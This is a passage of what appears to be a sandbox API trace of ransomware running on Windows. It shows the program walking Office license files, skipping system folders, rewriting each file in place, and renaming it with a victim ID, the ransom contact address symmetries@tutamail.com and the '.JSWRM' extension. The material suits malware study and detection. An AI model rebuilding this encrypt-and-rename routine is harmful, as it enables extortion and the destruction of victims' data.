MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0107.674] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0107.674] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d298, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0107.674] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0107.674] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0107.674] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0107.674] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1e0 [0107.674] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1e0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0107.674] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1e0 | out: hHeap=0x1e0000) returned 1 [0107.674] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b6a0 [0107.674] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23f970 [0107.674] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b6a0 | out: hHeap=0x1e0000) returned 1 [0107.674] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0107.674] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProfessionalR_Trial-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\professionalr_trial-ul-oob.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProfessionalR_Trial-ul-oob.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\professionalr_trial-ul-oob.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0107.675] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f970 | out: hHeap=0x1e0000) returned 1 [0107.675] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236468 | out: hHeap=0x1e0000) returned 1 [0107.675] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236018 | out: hHeap=0x1e0000) returned 1 [0107.675] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0107.675] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0107.675] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe8bb5c78, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe8bb5c78, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe8c7483f, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2bc7, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="ProjectProCO365R_Subscription-pl.xrm-ms", cAlternateFileName="PROJEC~1.XRM")) returned 1 [0107.675] lstrcmpiW (lpString1="ProjectProCO365R_Subscription-pl.xrm-ms", lpString2=".") returned 1 [0107.675] lstrcmpiW (lpString1="ProjectProCO365R_Subscription-pl.xrm-ms", lpString2="..") returned 1 [0107.675] lstrcmpiW (lpString1="ProjectProCO365R_Subscription-pl.xrm-ms", lpString2="...") returned 1 [0107.675] lstrcmpiW (lpString1="ProjectProCO365R_Subscription-pl.xrm-ms", lpString2="windows") returned -1 [0107.675] lstrcmpiW (lpString1="ProjectProCO365R_Subscription-pl.xrm-ms", lpString2="recovery") returned -1 [0107.675] lstrcmpiW (lpString1="ProjectProCO365R_Subscription-pl.xrm-ms", lpString2="perflogs") returned 1 [0107.675] lstrcmpiW (lpString1="ProjectProCO365R_Subscription-pl.xrm-ms", lpString2="documents and settings") returned 1 [0107.675] lstrcmpiW (lpString1="ProjectProCO365R_Subscription-pl.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0107.675] lstrcmpiW (lpString1="ProjectProCO365R_Subscription-pl.xrm-ms", lpString2="system volume information") returned -1 [0107.675] lstrcmpiW (lpString1="ProjectProCO365R_Subscription-pl.xrm-ms", lpString2="msocache") returned 1 [0107.675] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c7a0 [0107.675] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProjectProCO365R_Subscription-pl.xrm-ms", cchWideChar=39, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 39 [0107.675] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0107.675] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProjectProCO365R_Subscription-pl.xrm-ms", cchWideChar=39, lpMultiByteStr=0x22d260, cbMultiByte=39, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProjectProCO365R_Subscription-pl.xrm-ms", lpUsedDefaultChar=0x0) returned 39 [0107.675] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c7a0 | out: hHeap=0x1e0000) returned 1 [0107.675] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c5e8 [0107.675] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProjectProCO365R_Subscription-pl.xrm-ms", cchWideChar=39, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 39 [0107.676] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0107.676] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProjectProCO365R_Subscription-pl.xrm-ms", cchWideChar=39, lpMultiByteStr=0x22ce70, cbMultiByte=39, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProjectProCO365R_Subscription-pl.xrm-ms", lpUsedDefaultChar=0x0) returned 39 [0107.676] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c5e8 | out: hHeap=0x1e0000) returned 1 [0107.676] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b380 [0107.676] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236240 | out: hHeap=0x1e0000) returned 1 [0107.676] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0107.676] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0107.676] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24c0c8 [0107.676] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProjectProCO365R_Subscription-pl.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\projectproco365r_subscription-pl.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0107.676] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=11207) returned 1 [0107.676] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0107.676] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2bc0) returned 0x24c1d0 [0107.676] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2bc0, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2bc0, lpOverlapped=0x0) returned 1 [0107.679] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0107.679] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2bc0, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2bc0, lpOverlapped=0x0) returned 1 [0107.679] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0107.679] CloseHandle (hObject=0x45c) returned 1 [0107.679] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b448 [0107.679] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0107.679] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0107.679] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0107.679] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0107.679] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0107.679] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0107.679] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2d0 [0107.679] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2d0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0107.680] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2d0 | out: hHeap=0x1e0000) returned 1 [0107.680] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24be70 [0107.680] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23f720 [0107.680] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24be70 | out: hHeap=0x1e0000) returned 1 [0107.680] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0107.680] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProjectProCO365R_Subscription-pl.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\projectproco365r_subscription-pl.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProjectProCO365R_Subscription-pl.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\projectproco365r_subscription-pl.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0107.681] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f720 | out: hHeap=0x1e0000) returned 1 [0107.681] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b448 | out: hHeap=0x1e0000) returned 1 [0107.681] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c0c8 | out: hHeap=0x1e0000) returned 1 [0107.681] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0107.681] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0107.681] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe9c19fe7, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe9c19fe7, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe9cb2914, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x53a1, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="ProjectProCO365R_Subscription-ppd.xrm-ms", cAlternateFileName="PR2024~1.XRM")) returned 1 [0107.681] lstrcmpiW (lpString1="ProjectProCO365R_Subscription-ppd.xrm-ms", lpString2=".") returned 1 [0107.681] lstrcmpiW (lpString1="ProjectProCO365R_Subscription-ppd.xrm-ms", lpString2="..") returned 1 [0107.681] lstrcmpiW (lpString1="ProjectProCO365R_Subscription-ppd.xrm-ms", lpString2="...") returned 1 [0107.681] lstrcmpiW (lpString1="ProjectProCO365R_Subscription-ppd.xrm-ms", lpString2="windows") returned -1 [0107.681] lstrcmpiW (lpString1="ProjectProCO365R_Subscription-ppd.xrm-ms", lpString2="recovery") returned -1 [0107.681] lstrcmpiW (lpString1="ProjectProCO365R_Subscription-ppd.xrm-ms", lpString2="perflogs") returned 1 [0107.681] lstrcmpiW (lpString1="ProjectProCO365R_Subscription-ppd.xrm-ms", lpString2="documents and settings") returned 1 [0107.681] lstrcmpiW (lpString1="ProjectProCO365R_Subscription-ppd.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0107.681] lstrcmpiW (lpString1="ProjectProCO365R_Subscription-ppd.xrm-ms", lpString2="system volume information") returned -1 [0107.681] lstrcmpiW (lpString1="ProjectProCO365R_Subscription-ppd.xrm-ms", lpString2="msocache") returned 1 [0107.681] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232fc0 [0107.681] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProjectProCO365R_Subscription-ppd.xrm-ms", cchWideChar=40, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 40 [0107.681] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0107.681] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProjectProCO365R_Subscription-ppd.xrm-ms", cchWideChar=40, lpMultiByteStr=0x22d260, cbMultiByte=40, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProjectProCO365R_Subscription-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 40 [0107.681] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232fc0 | out: hHeap=0x1e0000) returned 1 [0107.681] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232c80 [0107.681] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProjectProCO365R_Subscription-ppd.xrm-ms", cchWideChar=40, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 40 [0107.681] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0107.681] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProjectProCO365R_Subscription-ppd.xrm-ms", cchWideChar=40, lpMultiByteStr=0x22d298, cbMultiByte=40, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProjectProCO365R_Subscription-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 40 [0107.681] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232c80 | out: hHeap=0x1e0000) returned 1 [0107.681] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b448 [0107.681] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b380 | out: hHeap=0x1e0000) returned 1 [0107.681] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0107.681] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0107.681] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b380 [0107.681] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProjectProCO365R_Subscription-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\projectproco365r_subscription-ppd.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0107.682] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=21409) returned 1 [0107.682] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0107.682] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x53a0) returned 0x24c1d0 [0107.682] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x53a0, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x53a0, lpOverlapped=0x0) returned 1 [0107.695] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0107.695] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x53a0, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x53a0, lpOverlapped=0x0) returned 1 [0107.695] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0107.695] CloseHandle (hObject=0x45c) returned 1 [0107.695] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24be70 [0107.695] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0107.695] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0107.695] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0107.695] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0107.695] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0107.695] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0107.695] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a360 [0107.696] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a360, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0107.696] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a360 | out: hHeap=0x1e0000) returned 1 [0107.696] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b510 [0107.696] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23ecb8 [0107.696] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b510 | out: hHeap=0x1e0000) returned 1 [0107.696] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0107.696] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProjectProCO365R_Subscription-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\projectproco365r_subscription-ppd.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProjectProCO365R_Subscription-ppd.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\projectproco365r_subscription-ppd.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0107.697] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23ecb8 | out: hHeap=0x1e0000) returned 1 [0107.697] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24be70 | out: hHeap=0x1e0000) returned 1 [0107.697] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b380 | out: hHeap=0x1e0000) returned 1 [0107.697] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0107.697] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0107.697] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe8fe1eb5, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe8fe1eb5, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe90a0a28, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2d86, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="ProjectProCO365R_Subscription-ul-oob.xrm-ms", cAlternateFileName="PRBBB3~1.XRM")) returned 1 [0107.707] lstrcmpiW (lpString1="ProjectProCO365R_Subscription-ul-oob.xrm-ms", lpString2=".") returned 1 [0107.707] lstrcmpiW (lpString1="ProjectProCO365R_Subscription-ul-oob.xrm-ms", lpString2="..") returned 1 [0107.707] lstrcmpiW (lpString1="ProjectProCO365R_Subscription-ul-oob.xrm-ms", lpString2="...") returned 1 [0107.707] lstrcmpiW (lpString1="ProjectProCO365R_Subscription-ul-oob.xrm-ms", lpString2="windows") returned -1 [0107.707] lstrcmpiW (lpString1="ProjectProCO365R_Subscription-ul-oob.xrm-ms", lpString2="recovery") returned -1 [0107.707] lstrcmpiW (lpString1="ProjectProCO365R_Subscription-ul-oob.xrm-ms", lpString2="perflogs") returned 1 [0107.707] lstrcmpiW (lpString1="ProjectProCO365R_Subscription-ul-oob.xrm-ms", lpString2="documents and settings") returned 1 [0107.707] lstrcmpiW (lpString1="ProjectProCO365R_Subscription-ul-oob.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0107.707] lstrcmpiW (lpString1="ProjectProCO365R_Subscription-ul-oob.xrm-ms", lpString2="system volume information") returned -1 [0107.707] lstrcmpiW (lpString1="ProjectProCO365R_Subscription-ul-oob.xrm-ms", lpString2="msocache") returned 1 [0107.707] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232fc0 [0107.707] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProjectProCO365R_Subscription-ul-oob.xrm-ms", cchWideChar=43, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 43 [0107.707] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0107.707] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProjectProCO365R_Subscription-ul-oob.xrm-ms", cchWideChar=43, lpMultiByteStr=0x22d260, cbMultiByte=43, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProjectProCO365R_Subscription-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 43 [0107.707] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232fc0 | out: hHeap=0x1e0000) returned 1 [0107.707] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x2331c8 [0107.707] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProjectProCO365R_Subscription-ul-oob.xrm-ms", cchWideChar=43, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 43 [0107.707] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0107.707] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProjectProCO365R_Subscription-ul-oob.xrm-ms", cchWideChar=43, lpMultiByteStr=0x22cdc8, cbMultiByte=43, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProjectProCO365R_Subscription-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 43 [0107.707] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2331c8 | out: hHeap=0x1e0000) returned 1 [0107.707] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b2b8 [0107.707] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b448 | out: hHeap=0x1e0000) returned 1 [0107.707] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0107.707] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0107.707] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24bce0 [0107.707] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProjectProCO365R_Subscription-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\projectproco365r_subscription-ul-oob.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0107.708] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=11654) returned 1 [0107.708] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: 